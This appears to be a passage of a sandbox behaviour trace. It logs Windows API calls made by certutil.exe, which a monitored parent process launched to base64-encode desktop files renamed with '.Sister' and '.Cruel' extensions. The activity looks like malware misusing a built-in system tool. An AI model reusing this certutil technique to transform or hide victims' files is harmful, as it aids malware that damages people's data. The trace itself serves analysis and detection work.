0xc1a2 [0207.551] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x70044 [0207.786] NtdllDefWindowProc_W () returned 0x0 [0207.787] NtdllDefWindowProc_W () returned 0x1 [0207.793] NtdllDefWindowProc_W () returned 0x0 [0207.804] UpdateWindow (hWnd=0x70044) returned 1 [0207.804] PostMessageW (hWnd=0x70044, Msg=0x400, wParam=0x0, lParam=0x2663270217e) returned 1 [0207.804] GetMessageW (in: lpMsg=0xe7cd6bf720, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe7cd6bf720) returned 1 [0207.805] TranslateMessage (lpMsg=0xe7cd6bf720) returned 0 [0207.805] DispatchMessageW (lpMsg=0xe7cd6bf720) returned 0x0 [0207.805] NtdllDefWindowProc_W () returned 0x0 [0207.805] GetMessageW (in: lpMsg=0xe7cd6bf720, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe7cd6bf720) returned 1 [0207.805] TranslateMessage (lpMsg=0xe7cd6bf720) returned 0 [0207.805] DispatchMessageW (lpMsg=0xe7cd6bf720) returned 0x0 [0207.805] LocalAlloc (uFlags=0x0, uBytes=0x96) returned 0x26632706330 [0207.805] LocalAlloc (uFlags=0x0, uBytes=0xa2) returned 0x26632704450 [0207.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0207.805] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0207.805] SetLastError (dwErrCode=0x80070716) [0207.805] _vsnwprintf (in: _Buffer=0xe7cd6bf128, _BufferCount=0xb, _Format="%d", _ArgList=0xe7cd6bf118 | out: _Buffer="465") returned 3 [0207.806] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xe7cd6beee0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0207.806] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2663270c340 [0207.806] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0207.806] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0207.806] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xe7cd6beec0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0207.806] GetLastError () returned 0xcb [0207.806] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0207.806] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0207.806] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0207.806] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0207.806] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0207.806] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0207.807] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0207.807] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0207.807] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0207.807] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0207.807] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0207.807] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0207.807] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0207.807] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0207.807] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0207.807] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0207.807] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0207.807] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0207.807] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0207.807] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0207.807] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0207.807] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xe7cd6beb88 | out: phkResult=0xe7cd6beb88*=0x23c) returned 0x0 [0207.807] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2663270ad80 [0207.807] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xe7cd6bf0f8, lpData=0xe7cd6bf128, lpcbData=0xe7cd6bf0f0*=0x4 | out: lpType=0xe7cd6bf0f8*=0x0, lpData=0xe7cd6bf128*=0x0, lpcbData=0xe7cd6bf0f0*=0x4) returned 0x2 [0207.807] LocalFree (hMem=0x2663270ad80) returned 0x0 [0207.807] RegCloseKey (hKey=0x23c) returned 0x0 [0207.808] LocalFree (hMem=0x0) returned 0x0 [0207.808] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2663272d960 [0207.821] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0207.821] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0207.821] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0207.821] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0207.821] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0207.821] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0207.821] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0207.821] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0207.821] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0207.821] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0207.821] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0207.821] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0207.822] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0207.822] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0207.822] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0207.822] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0207.924] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x26632728710 [0207.924] GetComputerNameW (in: lpBuffer=0x26632728710, nSize=0xe7cd6bf0f0 | out: lpBuffer="NQDPDE", nSize=0xe7cd6bf0f0) returned 1 [0207.924] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xe7cd6bf0c0 | out: lpBuffer=0x0, nSize=0xe7cd6bf0c0) returned 0 [0207.925] GetLastError () returned 0xea [0207.925] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2663271bd60 [0207.925] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2663271bd60, nSize=0xe7cd6bf0c0 | out: lpBuffer="NQdPdE", nSize=0xe7cd6bf0c0) returned 1 [0207.925] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0207.927] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x26632733ad0, cbCertEncoded=0x1463) returned 0x0 [0207.930] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x26632733ad0, cbCrlEncoded=0x1463) returned 0x0 [0207.930] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x26632733ad0, cbEncoded=0x1463, dwFlags=0x8000, pDecodePara=0xe7cd6befa0, pvStructInfo=0xe7cd6bf030, pcbStructInfo=0xe7cd6bf024 | out: pvStructInfo=0xe7cd6bf030, pcbStructInfo=0xe7cd6bf024) returned 0 [0207.930] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x26632733ad0, cbEncoded=0x1463, dwFlags=0x8000, pDecodePara=0xe7cd6befa0, pvStructInfo=0xe7cd6bf030, pcbStructInfo=0xe7cd6bf024 | out: pvStructInfo=0xe7cd6bf030, pcbStructInfo=0xe7cd6bf024) returned 0 [0207.931] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x26632733ad0, cbEncoded=0x1463, dwFlags=0x8000, pDecodePara=0xe7cd6befa0, pvStructInfo=0xe7cd6bf030, pcbStructInfo=0xe7cd6bf024 | out: pvStructInfo=0xe7cd6bf030, pcbStructInfo=0xe7cd6bf024) returned 0 [0207.931] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x26632714dc0 [0207.940] CryptMsgUpdate (hCryptMsg=0x26632714dc0, pbData=0x26632733ad0, cbData=0x1463, fFinal=1) returned 0 [0207.940] GetLastError () returned 0x8009310b [0207.940] CryptMsgClose (hCryptMsg=0x26632714dc0) returned 1 [0207.940] GetFileAttributesExW (in: lpFileName="23wggka_3I9jMmhYgMoj.jpg.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\23wggka_3i9jmmhygmoj.jpg.sister"), fInfoLevelId=0x0, lpFileInformation=0xe7cd6bf050 | out: lpFileInformation=0xe7cd6bf050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b6def0, ftCreationTime.dwHighDateTime=0x1d5e4d2, ftLastAccessTime.dwLowDateTime=0xd3f2e690, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0xd3f2e690, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0x1463)) returned 1 [0207.940] _vsnwprintf (in: _Buffer=0xe7cd6bf058, _BufferCount=0xb, _Format="%d", _ArgList=0xe7cd6bf048 | out: _Buffer="359") returned 3 [0207.940] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xe7cd6bee10, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0207.940] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x26632728e30 [0207.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0207.940] _vsnwprintf (in: _Buffer=0xe7cd6be040, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xe7cd6bf098 | out: _Buffer="Input Length = 5219") returned 19 [0207.941] GetFileType (hFile=0x50) returned 0x2 [0207.941] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe7cd6be040*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0xe7cd6bdff4, lpReserved=0x0 | out: lpBuffer=0xe7cd6be040*, lpNumberOfCharsWritten=0xe7cd6bdff4*=0x13) returned 1 [0208.081] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0208.081] _vsnwprintf (in: _Buffer=0xe7cd6be040, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe7cd6bf098 | out: _Buffer="\n") returned 1 [0208.081] GetFileType (hFile=0x50) returned 0x2 [0208.082] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe7cd6be040*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe7cd6bdff4, lpReserved=0x0 | out: lpBuffer=0xe7cd6be040*, lpNumberOfCharsWritten=0xe7cd6bdff4*=0x1) returned 1 [0208.558] GetFileAttributesExW (in: lpFileName="23wggka_3I9jMmhYgMoj.jpg.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\23wggka_3i9jmmhygmoj.jpg.cruel"), fInfoLevelId=0x0, lpFileInformation=0xe7cd6bf050 | out: lpFileInformation=0xe7cd6bf050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ca4a32, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xa6ca4a32, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa6e0229a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1c42)) returned 1 [0208.558] _vsnwprintf (in: _Buffer=0xe7cd6bf058, _BufferCount=0xb, _Format="%d", _ArgList=0xe7cd6bf048 | out: _Buffer="361") returned 3 [0208.558] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xe7cd6bee10, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0208.559] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x26632728bc0 [0208.559] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0208.559] _vsnwprintf (in: _Buffer=0xe7cd6be040, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xe7cd6bf098 | out: _Buffer="Output Length = 7234") returned 20 [0208.559] GetFileType (hFile=0x50) returned 0x2 [0208.559] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe7cd6be040*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xe7cd6bdff4, lpReserved=0x0 | out: lpBuffer=0xe7cd6be040*, lpNumberOfCharsWritten=0xe7cd6bdff4*=0x14) returned 1 [0208.732] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0208.732] _vsnwprintf (in: _Buffer=0xe7cd6be040, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe7cd6bf098 | out: _Buffer="\n") returned 1 [0208.732] GetFileType (hFile=0x50) returned 0x2 [0208.732] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe7cd6be040*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe7cd6bdff4, lpReserved=0x0 | out: lpBuffer=0xe7cd6be040*, lpNumberOfCharsWritten=0xe7cd6bdff4*=0x1) returned 1 [0209.030] LocalFree (hMem=0x26632733ad0) returned 0x0 [0209.030] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0209.030] _vsnwprintf (in: _Buffer=0xe7cd6bf0b8, _BufferCount=0xb, _Format="%d", _ArgList=0xe7cd6bf0a8 | out: _Buffer="2022") returned 4 [0209.030] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xe7cd6bee70, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0209.030] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x26632709e70 [0209.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0209.030] _vsnwprintf (in: _Buffer=0xe7cd6be0a0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xe7cd6bf0f8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0209.030] GetFileType (hFile=0x50) returned 0x2 [0209.030] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe7cd6be0a0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xe7cd6be054, lpReserved=0x0 | out: lpBuffer=0xe7cd6be0a0*, lpNumberOfCharsWritten=0xe7cd6be054*=0x31) returned 1 [0209.128] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0209.128] _vsnwprintf (in: _Buffer=0xe7cd6be0a0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe7cd6bf0f8 | out: _Buffer="\n") returned 1 [0209.128] GetFileType (hFile=0x50) returned 0x2 [0209.128] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe7cd6be0a0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe7cd6be054, lpReserved=0x0 | out: lpBuffer=0xe7cd6be0a0*, lpNumberOfCharsWritten=0xe7cd6be054*=0x1) returned 1 [0209.395] LocalFree (hMem=0x0) returned 0x0 [0209.395] LocalFree (hMem=0x26632704450) returned 0x0 [0209.395] LocalFree (hMem=0x26632706330) returned 0x0 [0209.395] SetLastError (dwErrCode=0x80070716) [0209.395] _vsnwprintf (in: _Buffer=0xe7cd6bf128, _BufferCount=0xb, _Format="%d", _ArgList=0xe7cd6bf118 | out: _Buffer="511") returned 3 [0209.395] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xe7cd6beee0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0209.395] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x26632728ad0 [0209.395] PostQuitMessage (nExitCode=0) [0209.395] GetMessageW (in: lpMsg=0xe7cd6bf720, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe7cd6bf720) returned 0 [0209.395] LocalFree (hMem=0x2663271bd60) returned 0x0 [0209.395] LocalFree (hMem=0x26632728710) returned 0x0 [0209.395] LocalFree (hMem=0x0) returned 0x0 [0209.396] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0209.396] GetLastError () returned 0x7e [0209.396] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0209.397] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0209.397] DllMain () returned 0x1 [0209.397] LocalFree (hMem=0x2663271bb00) returned 0x0 [0209.397] LocalFree (hMem=0x2663270c340) returned 0x0 [0209.397] LocalFree (hMem=0x26632728e30) returned 0x0 [0209.397] LocalFree (hMem=0x26632728bc0) returned 0x0 [0209.397] LocalFree (hMem=0x26632709e70) returned 0x0 [0209.397] LocalFree (hMem=0x26632728ad0) returned 0x0 [0209.397] LocalFree (hMem=0x26632713f20) returned 0x0 [0209.397] LocalFree (hMem=0x2663270c130) returned 0x0 [0209.397] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0209.397] GetLastError () returned 0x7e [0209.398] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdec10000 [0209.398] GetProcAddress (hModule=0x7ffcdec10000, lpProcName="DllMain") returned 0x7ffcdec11530 [0209.398] DllMain () returned 0x1 [0209.398] exit (_Code=0) Thread: id = 33 os_tid = 0x136c Process: id = "8" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x225fd000" os_pid = "0x4ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"2QVQiUvIc2zuhpxx-t.mp4.Sister\" \"2QVQiUvIc2zuhpxx-t.mp4.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 34 os_tid = 0x36c [0213.636] GetStartupInfoW (in: lpStartupInfo=0x6677a7f910 | out: lpStartupInfo=0x6677a7f910*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"2QVQiUvIc2zuhpxx-t.mp4.Sister\" \"2QVQiUvIc2zuhpxx-t.mp4.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0213.637] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0213.744] __set_app_type (_Type=0x1) [0213.744] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0213.744] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0213.747] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0213.747] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0213.747] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0213.748] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0213.748] WerSetFlags () returned 0x0 [0213.748] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.748] __iob_func () returned 0x7ffcea2dea00 [0213.748] _fileno (_File=0x7ffcea2dea30) returned 1 [0213.748] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0213.748] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0213.749] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0213.749] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0213.749] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0213.750] GetConsoleOutputCP () returned 0x1b5 [0213.868] _vsnwprintf (in: _Buffer=0x6677a7f880, _BufferCount=0xb, _Format=".%d", _ArgList=0x6677a7f7a8 | out: _Buffer=".437") returned 4 [0213.868] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0213.868] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0213.869] GetFileType (hFile=0x50) returned 0x2 [0213.869] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0213.869] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0213.869] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.987] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0213.987] GetCommandLineW () returned="certutil -encode \"2QVQiUvIc2zuhpxx-t.mp4.Sister\" \"2QVQiUvIc2zuhpxx-t.mp4.Cruel\"" [0213.987] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1e34ffab9c0 [0213.987] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1e34ff9af30 [0213.987] LocalFree (hMem=0x1e34ffab9c0) returned 0x0 [0213.987] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1e34ffa44f0 [0213.988] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1e34ffa3e60 [0213.988] LocalFree (hMem=0x1e34ffa44f0) returned 0x0 [0213.988] LocalFree (hMem=0x1e34ff9af30) returned 0x0 [0213.988] LocalFree (hMem=0x0) returned 0x0 [0213.988] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0213.988] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0213.989] GetCommandLineW () returned="certutil -encode \"2QVQiUvIc2zuhpxx-t.mp4.Sister\" \"2QVQiUvIc2zuhpxx-t.mp4.Cruel\"" [0213.989] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1e34ffab820 [0213.989] GetSystemTime (in: lpSystemTime=0x6677a7f570 | out: lpSystemTime=0x6677a7f570*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x30, wSecond=0x30, wMilliseconds=0x211)) [0213.989] SystemTimeToFileTime (in: lpSystemTime=0x6677a7f570, lpFileTime=0x6677a7f568 | out: lpFileTime=0x6677a7f568) returned 1 [0213.989] FileTimeToLocalFileTime (in: lpFileTime=0x6677a7f568, lpLocalFileTime=0x6677a7f530 | out: lpLocalFileTime=0x6677a7f530) returned 1 [0213.989] FileTimeToSystemTime (in: lpFileTime=0x6677a7f530, lpSystemTime=0x6677a7f2a0 | out: lpSystemTime=0x6677a7f2a0) returned 1 [0213.989] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x6677a7f2a0, lpFormat=0x0, lpDateStr=0x6677a7f3b0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0213.989] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x6677a7f2a0, lpFormat=0x0, lpTimeStr=0x6677a7f2b0, cchTime=128 | out: lpTimeStr="8:48 PM") returned 8 [0213.990] _vsnwprintf (in: _Buffer=0x6677a7f2be, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x6677a7f288 | out: _Buffer=" 48.529s") returned 8 [0213.990] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1e34ffae2c0 [0213.990] SetLastError (dwErrCode=0x80070716) [0213.990] _vsnwprintf (in: _Buffer=0x6677a7f338, _BufferCount=0xb, _Format="%d", _ArgList=0x6677a7f328 | out: _Buffer="948") returned 3 [0213.990] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x6677a7f0f0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0213.990] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1e34ffab460 [0213.990] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1e34ffb4c00 [0213.991] LocalFree (hMem=0x1e34ffae2c0) returned 0x0 [0213.991] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6677a7f5e0 | out: lpSystemTimeAsFileTime=0x6677a7f5e0*(dwLowDateTime=0xaa284b7f, dwHighDateTime=0x1d6141f)) [0213.991] GetLocalTime (in: lpSystemTime=0x6677a7f618 | out: lpSystemTime=0x6677a7f618*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x30, wSecond=0x30, wMilliseconds=0x213)) [0213.991] SystemTimeToFileTime (in: lpSystemTime=0x6677a7f618, lpFileTime=0x6677a7f5f0 | out: lpFileTime=0x6677a7f5f0) returned 1 [0213.991] CompareFileTime (lpFileTime1=0x6677a7f5f0, lpFileTime2=0x6677a7f5e0) returned 1 [0213.991] _vsnwprintf (in: _Buffer=0x6677a7f628, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x6677a7f5b8 | out: _Buffer="GMT + 2.00") returned 10 [0213.991] LocalFree (hMem=0x1e34ffab820) returned 0x0 [0213.991] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcc9760000 [0213.992] FindResourceW (hModule=0x7ffcc9760000, lpName=0x1, lpType=0x10) returned 0x7ffcc9820090 [0213.992] LoadResource (hModule=0x7ffcc9760000, hResInfo=0x7ffcc9820090) returned 0x7ffcc98200b0 [0213.992] LockResource (hResData=0x7ffcc98200b0) returned 0x7ffcc98200b0 [0213.992] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0213.992] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x6677a7f658 | out: _Buffer="10.0.15063.447") returned 14 [0213.992] GetACP () returned 0x4e4 [0213.992] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0213.992] LocalAlloc (uFlags=0x0, 